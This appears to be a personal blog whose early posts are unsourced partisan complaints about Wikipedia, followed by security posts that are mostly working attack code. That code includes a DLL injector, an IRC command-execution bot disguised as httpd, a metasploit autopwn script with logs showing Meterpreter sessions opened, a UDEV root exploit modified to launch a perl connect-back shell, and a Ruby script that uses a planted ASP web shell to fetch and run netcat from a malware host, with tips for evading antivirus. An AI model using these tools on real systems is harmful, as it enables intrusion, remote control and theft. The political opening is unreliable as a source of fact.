I do not like Wikipedia, it's information in many cases is extremely bias and inaccurate, they are unwilling to promote facts yet unfortunatly, they are seen as the most authoritive figure in inter-fact.

If you don't believe me, google for things like "wikipedia inaccuracies", "wikipedia biased", "wikipedia inaccurate" or any other likely keywords and wake up!

Just who is editing and managing wiki articles?

"if Wikipedia is "history", then history is indeed bunk" - Petronella Wayte.

Rather than Wikidpedia, I rather this cool site which seems to promote a more accurate version of current information and historical record based on fact. Better job.

http://www.conservapedia.com/Main_Page

Labels: Random

Webster Tarpley has released a new book called "Obama, The Unauthorised Biography".

If you do not know who Webster Tarpley is, here is a link to his site: http://www.tarpley.net

#### Part One



#### Part Two



Anyway, after all that, now the last video - this is an interesting view, please enjoy it and leave a comment :)

Labels: Random, Videos

I wrote a little DLL injector to switch off IsBeingDebugged and reset the NtGlobalFlags entries in the processes PEB. Pointless really since there are numerous OllyDBG / IDA plugins to do it, but I had some free time.

Final version as always can be found at open-security.org or nodefense.org


/*
dll_inject.c
Injects isdebugged.dll to switch off IsDebugged flag in PEB structure.
*/
#include
#include

int main(int argc, char * argv[])
{
char buff[50] = {0};
char * mydll = "isdebugged.dll";
unsigned long procID = 0;
DWORD hLibModule = 0;
HANDLE Proc = NULL, hThread = NULL;
HWND targetWnd;
LPVOID VaMemSpace, MyLibLoad;
LPCWSTR windowName = L"Command Prompt";
CONTEXT context;

targetWnd = FindWindow(
NULL,
windowName);

if(!GetWindowThreadProcessId(
targetWnd,
&procID)) {
printf("GetWindowThreadProcessId error: %d", GetLastError());
exit(1);
}

if(!procID) {
exit(1);
}

printf("Got process ID [%lu]\n", procID);

Proc = OpenProcess(
PROCESS_CREATE_THREAD|SYNCHRONIZE|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,
FALSE,
procID);

if(Proc == NULL) {
printf("OpenProcess error: %d\n", GetLastError());
return FALSE;
}

MyLibLoad = GetProcAddress(
GetModuleHandle(
L"kernel32.dll"),
"LoadLibraryA");

VaMemSpace = VirtualAllocEx(
Proc,
NULL,
strlen(mydll),
MEM_COMMIT|MEM_RESERVE,
PAGE_READWRITE);

if(VaMemSpace == NULL) {
printf("VirtualAlloc error: %d\n", GetLastError());
return FALSE;
}

WriteProcessMemory(
Proc,
VaMemSpace,
mydll,
strlen(mydll),
NULL);

if(WriteProcessMemory == 0) {
printf("WriteProcessMemory error: %d", GetLastError());
return FALSE;
}

CreateRemoteThread(
Proc,
NULL,
NULL,
(LPTHREAD_START_ROUTINE)MyLibLoad,
VaMemSpace,
NULL,
NULL);

if(CreateRemoteThread == NULL) {
printf("CreateRemoteThread error: %d\n", GetLastError());
return FALSE;
}

printf("Created the new thread!\n");

CloseHandle(hThread);

VirtualFreeEx(
Proc,
VaMemSpace,
sizeof(mydll),
MEM_RELEASE);

if(VirtualFreeEx == 0) {
printf("VirtualFreeEx error: %d\n", GetLastError());
return FALSE;
}
return TRUE;
}



/*
isdebugged.dll

Resets IsBeingDebugged PEB entry
Resets NtGlobalFlags PEB entry
*/

#include
#include
#include

__declspec(dllexport) void SetINT(void)
{
printf("Setting INT 3 trap\n");
_asm
{
int 3
}
}

__declspec(dllexport) void SetDebugFlag(void)
{
printf("Resetting PEB's BeingDebugged entry\n");
_asm
{
mov eax, dword ptr fs:[0x18]
mov eax, dword ptr ds:[eax+0x30]
test eax, eax
mov byte ptr ds:[eax+0x2], 0x0
}
printf("Resetting PEB's NtGlobalFlags entry\n");
_asm
{
mov eax, dword ptr fs:[0x18]
mov eax, dword ptr ds:[eax+0x30]
mov byte ptr ds:[eax+0x68], 0x0
}
printf("Done modifying PEB\n");
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved, int argc, char * argv[])
{
switch(ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:

printf("Entering the process... Weee!\n");
SetDebugFlag();
break;

case DLL_PROCESS_DETACH:
printf("Leaving the process... Poof!\n");
break;
}
return TRUE;
}

Labels: Security

/*
* An SSL IRC bot that will run some commands on teh hoster, useful for running
* john on your linux box via irc during a pentest - cheap man's VPN ;)
*
* Has a couple of little bugs which I might fix, but it serves it's simple purpose.
*
* You should change the stuff in SSLTYPE1 & SSLTYPE2 to match your own box, I
* just added that as a test to see if it would tell if a MITM was present.
*
* !e uname -e
* 22:46 -lolipopz(lolipopz@roflwafflez)- Linux boxen.nodefense.org 2.6.24-23-xen #1
* SMP Mon Jan 26 03:09:12 UTC 2009 x86_64 x86_64 x86_64 GNU/Linux
*
* Latest version can be found here -> http://nodefense.org/files/ruxbot.c
*
*/
#include < stdio.h > // You will have to fix these spaces, blogspot's fault.
#include < string.h >
#include < unistd.h >
#include < arpa/inet.h >
#include < sys/ptrace.h >
#include < sys/socket.h >
#include < sys/types.h >
#include < resolv.h >
#include < netdb.h >
#include < openssl/ssl.h >
#include < openssl/err.h >

#define OWNER "mastahrux"
#define NICK "ruxx_bot"
#define USER "ruxx_bot"
#define CHAN "ruxxor"
#define SERV "127.0.0.1"
#define PASS "" //channel password
#define PORT 65531

#define LABEL "/usr/sbin/httpd"
#define SSLTYPE1 "AES256-SHA"
#define SSLTYPE2 "TLSv1i/SSLv3"

#define BSIZE 80


SSL_CTX*
initctx(void)
{
SSL_METHOD *method;
SSL_CTX *ctx;
SSL_library_init();
OpenSSL_add_all_algorithms();

method = SSLv23_client_method();
ctx = SSL_CTX_new(method);

return ctx;
}


void
srvsend(SSL *ssl, char *msg)
{
if(SSL_write(ssl, msg, strlen(msg)) < 1)
exit(1);
}


char *
srvread(SSL *ssl)
{
int bytes;
char buf[2048] = {0};
char * msgbuf = (char *)malloc(BSIZE);
char * ret = NULL;

bytes = SSL_read(ssl, buf, sizeof(buf));

if((sizeof(bytes) > 2047) || sizeof(bytes) < 1)
exit(1);
buf[bytes] = '\0';

if(strstr(buf, "PING")) {
sleep(2);
memset(msgbuf, 0, BSIZE);
snprintf(msgbuf, strlen(SERV) + 8, "PONG :%s\r\n", SERV);
srvsend(ssl, msgbuf);
}

if(strstr(buf, "/msg")) {
return;
}

free(msgbuf);

ret = buf;
return ret;
}


void
runcmd(SSL *ssl, char * cmdptr)
{
char lol[256] = {0}, buf[256] = {0};
char * cmdbuf = (char *)malloc(2048);
FILE * sys = NULL;

memset(cmdbuf, 0, 2048);

if(strlen(cmdptr) > 255)
return;

strncpy(lol, cmdptr, strlen(cmdptr)-2);
lol[255] = '\0';

cmdptr = strchr(lol, '!e ');

if(!memmove(cmdptr, cmdptr, strlen(cmdptr)))
return;

strcpy(buf, cmdptr+1);
buf[255] = '\0';

sys = popen(buf, "r");
if(!sys)
return;

while(fgets(buf, sizeof(buf)-1, sys)) {
snprintf(cmdbuf, strlen(buf) + strlen(OWNER) + 10, "NOTICE %s :%s\n", OWNER, buf);
srvsend(ssl, cmdbuf);
}
free(cmdbuf);
pclose(sys);
}


void
srvconn(SSL *ssl)
{
char * cmd = NULL;
char * cmdptr = NULL;
char * msgbuf = (char *)malloc(BSIZE);

struct set
{
char * chan;
char * pass;
char * user;
char * nick;
} irc;

irc.chan = CHAN;
irc.user = USER;
irc.nick = NICK;
irc.pass = PASS;

if(strlen(irc.chan) > 15 && strlen(irc.pass) > 15 && strlen(irc.user) > 15 && strlen(irc.nick) > 15)
exit(1);

memset(msgbuf, 0, BSIZE);
snprintf(msgbuf, strlen(irc.nick)+7, "NICK %s\r\n", irc.nick);
srvsend(ssl, msgbuf);

memset(msgbuf, 0, BSIZE);
snprintf(msgbuf, strlen(irc.user) + strlen(irc.user) + strlen(irc.user) + strlen(irc.user) + 11, "USER %s %s %s :%s\r\n", irc.user, irc.user, irc.user, irc.user);
srvsend(ssl, msgbuf);

memset(msgbuf, 0, BSIZE);
snprintf(msgbuf, strlen(irc.chan) + strlen(irc.pass) + 9, "JOIN #%s %s\r\n", irc.chan, irc.pass);
srvsend(ssl, msgbuf);

for(;;) {
cmd = srvread(ssl);
if((cmdptr = strstr(cmd,"!e"))) {
runcmd(ssl, cmdptr);
}
}
free(msgbuf);
}


int
srvssl(SSL *ssl)
{
if((!strstr(SSL_get_cipher_name(ssl), "AES256-SHA")) || (!strstr(SSL_get_cipher_version(ssl), "TLSv1i/SSLv3")))
return -1;
return 1;
}


int
main(int argc, char * argv[])
{
int conx, sock, port = PORT;
struct sockaddr_in sout;
struct hostent *he;
SSL_CTX *ctx;
SSL *ssl;
pid_t pid;

strcpy(argv[0], LABEL);

he = gethostbyname(SERV);

bzero((char *)&sout, sizeof(sout));
sout.sin_family = AF_INET;
sout.sin_port = htons(port);
memcpy(&sout.sin_addr.s_addr, he->h_addr, he->h_length);

sock = socket(AF_INET, SOCK_STREAM, 0);

ctx = initctx();
ssl = SSL_new(ctx);

pid = fork();

if(pid == 0) {
conx = connect(sock, (struct sockaddr *)&sout, sizeof(sout));

SSL_set_fd(ssl, sock);
SSL_connect(ssl);

if(srvssl(ssl))
srvconn(ssl);
}

close(sock);
SSL_free(ssl);
SSL_CTX_free(ctx);

return 0;
}

Labels: Security

This script will run nmap against a a box/network to find live boxes then scan it with nessus, importing the results to metasploit and then running autopwn against the vulnerabilities found which are targeted by the vulnID - it seems more efficient than running every exploit against every open port, al la the default autopwn method. It also saves owning the same breed of bug several times.

Just run it, go for a coffee and come back to get your r00t on :)


##
# Autopwn pwnmatic
##
#!/bin/sh
NESSUS=~/pentest/scanners/nessus/bin/ #nessus binary
MSF=~/pentest/exploiting/metasploit #msf console location
LOG=~/audits/scans/nessus/$2.nbe #report location

HOSTS=./nessus_hosts.txt
AUTOPWN=./autopwn

echo "Starting scan..."
nmap -v -n -sP $1 |grep Host | grep up | awk '{print $2}' > $HOSTS

echo "Scan finished, starting nessus..."
$NESSUS/nessus localhost 1337 user p4ssw0rd $HOSTS $LOG

echo "Nessus finished, converting log..."
$NESSUS/nessus -i $LOG -o $LOG.txt
$NESSUS/nessus -i $LOG -o $LOG.nessus

mv $HOSTS ~/audits/scans/nmap/$2-nmap_auto.txt

echo "Do you want to import into metasploit autopwn? (y/n)"
read DOU

if [ $DOU == "y" ] ; then
cat > $AUTOPWN << _EOF
db_create $2.db
db_import_nessus_nbe $LOG
db_autopwn -x -r -e
_EOF
echo "please wait..."
$MSF/msfconsole -r $AUTOPWN
else
echo "Listing any fulnerabilities then..."
A=`egrep "Security hole found" $LOG.txt | sort -u`
if [ $A -eq "" ] ; then
echo " --> None found :("
else
echo $A
fi
echo "Finished."
fi
##
# End
###


user@debauch:~/scripts$ ./pwnmatic.sh 192.168.224.0/24 test-run
Starting scan...
Scan finished, starting nessus...
Nessus finished, converting log...
Do you want to import into metasploit autopwn? (y/n)
y
please wait...


o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


=[ msf v3.3-dev
+ -- --=[ 379 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 158 aux

resource> db_create testing.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: testing.db
resource> db_import_nessus_nbe /home/user/audits/scans/nessus/testing.nbe
resource> db_autopwn -x -r -e
[*] (1/4): Launching exploit/windows/smb/ms04_011_lsass against 192.168.224.131:445...
[*] (2/4): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.224.131:135...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] (4/4): Launching exploit/windows/smb/ms06_040_netapi against 192.168.224.131:445...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.224.131[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.224.131[135] ...
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.224.131[\lsarpc]...
[*] Handler binding to LHOST 0.0.0.0
[*] Sending exploit ...
[*] Started reverse handler
msf >
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.224.131[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] The DCERPC service did not reply to our request
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.224.131[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.224.131[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] The DCERPC service did not reply to our request
[*] Meterpreter session 1 opened (192.168.224.129:34295 -> 192.168.224.131:1034)
[*] Meterpreter session 2 opened (192.168.224.129:23499 -> 192.168.224.131:1035)

msf > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.224.129:34295 -> 192.168.224.131:1034
2 Meterpreter 192.168.224.129:23499 -> 192.168.224.131:1035

msf >

Labels: Security

I noticed that a lot of times during a test, the UDEV exploit doesn't always work or you can't find the process ID due to restrictions on the user account.

For a 99.9% chance of success on all OS, I find the following works best:

Set up a listener on the local box:
screen
nc -l -p 1234 -v
ctrl + A + D


Change program.c to this:

cat > program.c <<>
...SNIP...
void _init()
{
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
execl("/usr/bin/perl","perl","/tmp/connectback.pl","localhost","1234",NULL);
}

Works a treat. And if you can't get the PID, this simple little script will solve the problem 100% of the time

NUM=10
while [ $NUM -lt 4000 ] ; do
/tmp/udev $NUM&
((NUM = NUM +1))
done

Labels: Security

Very useful during pentests. This script will download an executable to the clients
Windows box by using Microsoft.XMLHTTP object to initiate an interweb session.
Handy when you have uploaded an asp-shell to a box and need to get some tools
downloaded to help pop that shell.

Creates a .vbs script and runs via wscript.exe - just make sure to recompile nc.exe
so the md5sum changes and you don't get it blatted by some AV or Proxy tools.

#!/usr/bin/ruby
require 'timeout'
require 'net/http'
require 'net/https'

$packhost = "malhoster.com" #MalHost
$shellink = "/blah/cmd.asp" #Shell Location
$packpath = "malpath" #Path to malware
$pack = "netcat.exe" #WinPack

Target = {
#'asp' => 'Myshell w00t',
'aspx' => 'Myshell w00t',
#'pl' => 'Myshell w00t',
#'cgi' => 'Myshell w00t',
#'php' => 'Myshell w00t',
#'jsp' => 'Myshell w00t',
}

if ARGV[0].nil?
puts "ruby winshell.rb "
exit!
end


class WEB
def pwnage
ports = [8080, 443, 80]

until ports.empty? do
$rhost = ARGV[0]
$rport = (ports.pop).to_i

$http = Net::HTTP.new($rhost,$rport)
$http.use_ssl = true if $rport == 443
$http.verify_mode = OpenSSL::SSL::VERIFY_NONE
$http.open_timeout = 10
$http.read_timeout = 10

resp, data = $http.get("#{$shellink}", nil)

if data.include? Target['asp']
puts " -> found #{Target['asp']}"

winstager
end
end
rescue Interrupt ; puts " [-] Terminated session"
rescue Timeout::Error
rescue Errno::ECONNREFUSED
rescue Errno::EHOSTUNREACH
rescue Errno::ENETUNREACH
rescue Errno::ECONNRESET
rescue Errno::ETIMEDOUT
rescue OpenSSL::SSL::SSLError
rescue Net::HTTPBadResponse
rescue EOFError
end
end


def winstager
Timeout::timeout(20) do
puts "Deploying package..."
$shellink = $shellink+"?cmd="
$http.get("#{$shellink}cmd+%2Fc+echo+Dim+DataBin+>+dl.vbs")
$http.get("#{$shellink}cmd+%2Fc+echo+Dim+HTTPGet+>>+dl.vbs")
$http.get("#{$shellink}cmd+%2Fc+echo+Set+HTTPGET+%3D+CreateObject(\"Microsoft.XMLHTTP\")+>>+dl.vbs")
$http.get("#{$shellink}cmd+%2Fc+echo+HTTPGET.Open+\"GET\"%2C+\"http://#{$packhost}%2F#{$packpath}%2F#{$pack}\"%2C+False+>>+dl.vbs")
$http.get("#{$shellink}cmd+%2Fc+echo+HTTPGet.Send+>>+dl.vbs")
$http.get("#{$shellink}cmd+%2Fc+echo+DataBin+%3D+HTTPGET.ResponseBody+>>+dl.vbs")
$http.get("#{$shellink}cmd+%2Fc+echo+Const+adTypeBinary%3D1+>>+dl.vbs")
$http.get("#{$shellink}cmd+%2Fc+echo+Const+adSaveCreateOverWrite%3D2+>>+dl.vbs")
sleep 2
$http.get("#{$shellink}cmd+%2Fc+echo+Dim+test1+>>+dl.vbs")
$http.get("#{$shellink}cmd+%2Fc+echo+Set+test1+%3D+CreateObject(\"ADODB.Stream\")+>>+dl.vbs")
$http.get("#{$shellink}cmd+%2Fc+echo+test1.Type+%3D+adTypeBinary+>>+dl.vbs")
$http.get("#{$shellink}cmd+%2Fc+echo+test1.Open+>>+dl.vbs")
$http.get("#{$shellink}cmd+%2Fc+echo+test1.Write+DataBin+>>+dl.vbs")
$http.get("#{$shellink}cmd+%2Fc+echo+test1.SaveToFile+\"#{$pack}\"%2C+adSaveCreateOverWrite+>>+dl.vbs")
$http.get("#{$shellink}cmd+%2Fc+wscript+dl.vbs")
$http.get("#{$shellink}cmd+%2Fc+#{$pack}+192.168.1.1+53")
sleep 2 ; puts "Complete!"
end
rescue Timeout::Error
rescue Errno::ECONNREFUSED
rescue Errno::EHOSTUNREACH
rescue Errno::ENETUNREACH
rescue Errno::ECONNRESET
rescue Errno::ETIMEDOUT
rescue OpenSSL::SSL::SSLError
rescue Net::HTTPBadResponse
rescue EOFError
end

start = WEB.new
start.pwnage

Labels: Security